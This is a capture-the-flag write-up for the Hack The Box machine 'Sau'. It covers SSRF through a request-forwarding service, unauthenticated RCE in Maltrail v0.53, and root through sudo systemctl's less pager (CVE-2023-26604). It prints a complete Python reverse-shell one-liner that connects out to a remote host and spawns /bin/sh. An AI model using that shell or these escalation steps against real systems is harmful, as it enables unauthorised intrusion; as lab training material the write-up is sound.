..

HTB - Sau

Summary

Initial nmap scan shows that this box is hosting a web service on port 55555, and port 80 is filtered. The service is similar to a URL shortener, but for making API calls. Because port 80 is not directly accessible, we can proxy requests to localhost:80 by using the URL shortener to gain access to port 80.

Oddly enough, my browser does not render the page properly after being redirected. But, we can still view some information on the service hosted at port 80 by inspecting the source code, which indicates that it using Maltrail v0.53. A quick search online shows that this version of Maltrail is vulnerable to unauthenticated RCE through the username parameter at the login page. So, we setup a reverse shell using an exploit found online, and we get to the user.

Getting to root was pretty easy. We do sudo -l initially as usual, and find that we have sudo access to systemctl status trail.service. The relevant CVE for this vulnerability is CVE-2023-26604. We can run systemctl as sudo, and launch a shell by entering !/bin/sh. Then, we get to root. :D

Extra Info

A basic python reverse shell looks like this.

python -c 'import socket, os, pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

As for why we are able to get a root shell through systemctl:

A vulnerability was found in the systemd package. The systemd package does not adequately block local privilege escalation for some Sudo configurations, for example, plausible sudoers files, in which the systemctl status command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This issue presents a substantial security risk when running systemctl from Sudo because less executes as root when the terminal size is too small to show the complete systemctl output.

Essentially, when the terminal is too small, systemctl will run using less, allowing us to use the technique found on GTFObins less. Since we have sudo access to systemctl, we can do a privilege escalation from less.

References